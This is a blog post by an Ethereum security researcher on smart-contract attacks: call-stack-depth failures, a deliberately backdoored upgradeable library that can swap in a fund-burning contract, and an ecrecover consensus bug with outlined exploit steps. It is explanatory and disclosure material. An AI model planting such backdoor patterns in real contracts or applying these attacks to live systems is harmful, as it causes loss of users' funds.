Devcon1 and Ethereum contract security

Devcon1

A few months ago, in November 2015, I was on-site in London for the Ethereum Developer Conference; Devcon1, courtesy of the Ethdev team for my bounty submissions.

It was an awesome conference, both for the talks themselves and the discussions with different individuals in the community. I was only able to attend the first three days, which were the most tech-oriented.

One of the people I talked to was Piper Merriam, developer of the Ethereum Alarm Clock. The alarm clock, which in my opinion perhaps could be better named “Ethereum Crontab” since it’s not an actual alarm clock, is a service which can be used to regularly invoke contracts.

In order to do so, it has a few challenges; incentivization of callers for one, handling of callee-behaviour another. One thing that struck me, and that we talked about, is the old “stack-depth” attack.

Call stack attack

The ‘call stack’ attack, to the best of my knowledge was first outlined by Least Authority in their security audit of Ethereum. Their analysis can be found here.

This is also known as “shallow stack attack” and “stack attack”. However, to be precise, the word stack is something else within the EVM, not to be confused with the call stack. There is a limit specifying how deep contracts can call other contracts; currently set to 1024. If a contract invokes another contract (either via CALL or CALLCODE), the operation will fail if the call stack depth limit has been reached. The failure is signalled to the caller by putting a 0 on the stack (the regular stack).

This behaviour makes it possible to subject a contract to a “call stack attack”. In such an attack, an attacker first creates a suitable depth of the stack, e.g. by recursive calls. After this step, the attacker invokes the targeted contract. If the targeted calls another contract, that call will fail. If the return value is not properly checked to see if the call was successfull, the consequences could be damaging.

Within the EVM, there is no difference between send (as in send value) and call (as in invoke contract) - they’re both implemented by CALL (or CALLCODE). So, both operations could be made to fail with this attack.

In order to fully understand this issue, I created some sample code in Solidity, a contract which calls a library:

library x{
    function foo();
}
contract Ballot {
    function y(){
        x(0).foo();
    }
}

This produces the following runtime code:

60606040526000357c010000000000000000000000000000000000000000000000000000000090048063a56dfe4a146037576035565b005b604260048050506044565b005b600073ffffffffffffffffffffffffffffffffffffffff1663c2985578604051817c010000000000000000000000000000000000000000000000000000000002815260040180905060006040518083038160008760325a03f2156002575050505b56

The relevant part (disassembled and annotated):

CALLCODE             x(0).foo() ; F2      // Invoke method
ISZERO               x(0).foo() ; 15      // Check top stack value
PUSH [ErrorTag]      x(0).foo() ; 60 02   // If 0, push bad destination ...
JUMPI                x(0).foo() ; 25      // ...and make illegal jump

Conclusion:

The CALLCODE instruction will, in the stack-depth-fail case, put 0 on the stack to signal an error.
Next instruction, ISZERO, converts top of stack from 0 to 1.
Next, it pushes [ErrorTag] (value 02), which is not a valid JUMPDEST.
JUMPI jumps to [ErrorTag] if top of stack != 0, causing invalid jump, and thus reverts the entire call.

From YP (p 11):

This states that the execution is in an exceptional halting state if there is insufficient gas, if the instruction is invalid (and therefore its Î´ subscript is undefined), if there are insufficient stack items, if a JUMP/JUMPI destination is invalid or the new stack size would be larger then 1024.

The consequence of this is that it behaves similar to OOG, performing a roll-back of the entire transaction.

It seems that checking call stack is not necessary for contracts written in Solidity, since the Solidity compiler puts guards in to protect against this. Serpent-contracts, on the other hand, seem like they need explicit guarding against this behaviour (although I have not tested it, it is stated in the documentation).

TLDR; Solidity-contracts need not worry about call-stack attacks on contract-invocations. Serpent contracts may need to worry about it.

So how about send ?

A Solidity-contract to send Ether:

contract Sender {
    function y(){
        address x = 0;
        x.send(4919);
    }
}

Relevant code:

CALL             x.send(4919)
SWAP4            x.send(4919)

For x.send(...), solidity does not place guards around the CALL. So in this instance, protection needs to be manually added. Example from Solidity tutorial:

contract Sharer {
    function sendHalf(address addr) returns (uint balance) {
        if (!addr.send(msg.value/2))
            throw; // also reverts the transfer to Sharer
        return this.balance;
    }
}

Alternatively, a stack check in the beginning of the function could be used to ensure that the call can be performed.

Piper Merriam created a library which can be used. I created an EIP to propose adding a CALLDEPTH opcode to the EVM - I don’t know if it’ll be implemented, I’m guessing it won’t be unless it gets included into Homestead. Homestead will necessitate a hard fork anyway.

Malicious libraries

Thinking about contract security, and the recent addition of libraries in Solidity, it can be worth thinking about whether libraries introduce any security vulnerabilities for callers.

A library is just an ordinary contract within the EVM. The difference is that instead of invoking the contract, the caller invokes the code within the caller context. Basically, this is the caller, not the callee. I wrote about this a while back (Quirk #3); it’s based on the CALLCODE operator. This is how it’s used:

library Library{
	uint add(uint x, uint y) returns(uint);
}
contract MyContract{
	
	address library;
	MyContract(address lib){
		library = lib;
		x = Library(lib).add(1,1);
	}

}

The library keyword tells the Solidity compiler to use CALLCODE instead of CALL. I decided to see if I could construct a scenario where a library is backdoored (but not totally obvious about it).

Construction of a malicious library

First of all, ĺet’s define a seemingly benign library which utilizes submodules to provide functionality.

/** This is the library interface of the Module Registry, keeping track 
of the actual implementations for each function **/

library MathModulesRegistryLib{
    function get_module(uint module) constant returns(address);
}

/* The trigonometry library interface */
library Trig_lib{
    function cosine(uint arg) constant returns(uint);
}

/* The Math contract */
contract Math{
    //This is a compile-time constant which must point to the 
    // math-registry of submodules
    uint constant MATH_REGISTRY_ADR = 0x692a70d2e424a56d2c6c27aa97d1a86395877b3a;
    
    /**
     * Below are math functions
     **/
     
    function cosine(uint n) constant returns (uint) {
        // First, if called as library, we need to obtain a reference to Trigonomertry by 
        // invoking the lib as a contract, with access to storage
        address trig_module = MathModulesRegistry(MATH_INSTANCE_ADR).get_module(0);

        //Dispatch to the trig library
        //Now, we make a `callcode` invocation of it
        return Trig_lib(trig_module).cosine(n);
    }
    /*
     * More math-functions below, all invoking different submodules
     */
}

As you can see, it provides cosine. It uses a registry to get the address for the concrete cosine implementation, and then calls via CALLCODE.

The registry looks like this:

contract MathModulesRegistry{
    
    mapping (uint => address) modules;
    address admin;
    
    function Math(address owner){
        admin = owner;
    }
    /*
     * Admin function to set module, for patch/update of modules
     */
    function set_module(address addr, uint module){
        if(msg.sender == admin){
          modules[module] = addr;  
        } 
    }
    /*
     * Returns address for the relevant submodule
     * Not a library function, must be called using `call`
     * Since it uses the contract storage for lookup
     * @param module
     * 0 : Trigonometry
     * 1 : Complex
     * 2 : Float
     * 3 : Conversion
     */
     
    function get_module(uint module) constant returns (address){
        return modules[module];
    }
}

As you can see, the admin can replace a module with a new version. Here is the first iteration:

/* The trigonometry contract
*/
contract Trig{
    function cosine(uint arg) constant returns(uint){
        //Close enough in many cases
        // Anyway, the admin will update the MathLib later on 
        // with a more accurate version
        return 42;
    }
}

Obviously, building a math lib takes a few iterations, so the creator made it possible to update the submodules and make them better.

In such a scenario as above, however, it would be trivial to replace the Trig module with something like this:

contract Burner{
	function(){
		address(0).send(this.balance);
	}
}

A contract which will burn all caller funds.

So, if you are using libraries, you better make sure there are no dynamic parts which can be swapped out in future versions. As I do believe that such patterns will be pretty common, you’re better off not calling them as libraries, but as contracts (that is, CALL instead of CALLCODE), keeping this to yourself.

Consensus bug bounty

One talk which I really enjoyed was the Joseph Chows talk about BTCRelay. I was a bit curious how that worked, since I know the opcodes pretty well and didn’t understand how verification of bitcoin PoW was performed. While looking into that, I noticed that I had glossed over the precompiled contracts part of the EVM.

There are four precompiled contracts; and they work just like any other contract. The four contracts defined are as follows:

execute the elliptic curve public key recovery function,
the SHA2 256-bit hash scheme,
the RIPEMD 160-bit hash scheme
and the identity function

The difference is that the gas price is fixed. To use one of the contracts, simply invoke it at the defined address, e.g ecdsa_recover at address 1.

I checked out the Yellow Paper for details, and one thing stood out:

Importantly in the case of an invalid signature (ECDSARECOVER(h, v, r, s) = ∅), then we have no output.

The I started skimming the code. Here’s how the python version looked:

	def proc_ecrecover(ext, msg):
	    # print('ecrecover proc', msg.gas)
	    OP_GAS = opcodes.GECRECOVER
	    gas_cost = OP_GAS
	    if msg.gas < gas_cost:
	        return 0, 0, []
	    b = [0] * 32
	    msg.data.extract_copy(b, 0, 0, 32)
	    h = b''.join([ascii_chr(x) for x in b])
	    v = msg.data.extract32(32)
	    r = msg.data.extract32(64)
	    s = msg.data.extract32(96)
	    if r >= bitcoin.N or s >= bitcoin.P or v < 27 or v > 28:
	        return 1, msg.gas - opcodes.GECRECOVER, [0] * 32
	    recovered_addr = bitcoin.ecdsa_raw_recover(h, (v, r, s))
	    if recovered_addr in (False, (0, 0)):
	        return 1, msg.gas - gas_cost, []
	    pub = bitcoin.encode_pubkey(recovered_addr, 'bin')
	    o = [0] * 12 + [safe_ord(x) for x in utils.sha3(pub[1:])[-20:]]
	    return 1, msg.gas - gas_cost, o

There are two failure cases here, and one success case.

Failure-case 1:

    if r >= bitcoin.N or s >= bitcoin.P or v < 27 or v > 28:
        return 1, msg.gas - opcodes.GECRECOVER, [0] * 32

Failure-case 2:

    if recovered_addr in (False, (0, 0)):
        return 1, msg.gas - gas_cost, []

So, obviously, Failure-case 1 violates the YP, returning 32 zeroes instead of empty. (Incidentally, Gustav Simonsson then found another issue within the two LOC of Failure-case 1. Can you?)

Here’s the CPP-code:

void ecrecoverCode(bytesConstRef _in, bytesRef _out)
{
	struct inType
	{
		h256 hash;
		h256 v;
		h256 r;
		h256 s;
	} in;

	memcpy(&in, _in.data(), min(_in.size(), sizeof(in)));

	h256 ret;
	u256 v = (u256)in.v;
	if (v >= 27 && v <= 28)
	{
		SignatureStruct sig(in.r, in.s, (byte)((int)v - 27));
		if (sig.isValid())
		{
			try
			{
				Public rec = recover(sig, in.hash);
				if (rec)
					ret = dev::sha3(rec);
				else
					return;
			}
			catch (...) { return; }
		}
	}

	memset(ret.data(), 0, 12);
	ret.ref().copyTo(_out);
}

A bit less trivial to spot… Curiously, it will behave much like Python but for a completely different reason. If the (v >= 27 && v <= 28) check fails, it will skip the recovery, but then still copy the empty data to the output.

A flaw such as this would not immediately trigger a consensus issue; in order to exploit it, the attacker needs to

Fill a chunk of memory with non-zero data
Set that chunk of memory as return-area
Invoke ecdsa_recover with invalid v-value,
Which will zero the memory in Cpp/Python, but not in Go.
Do something more, e.g. another operation (consume more gas) or write to storage.

The flaw got me another 5000 points on the bug bounty, to a total of 22500 points.

2015-12-30

tweets

Tweets by @mhswende

favorites

Favorites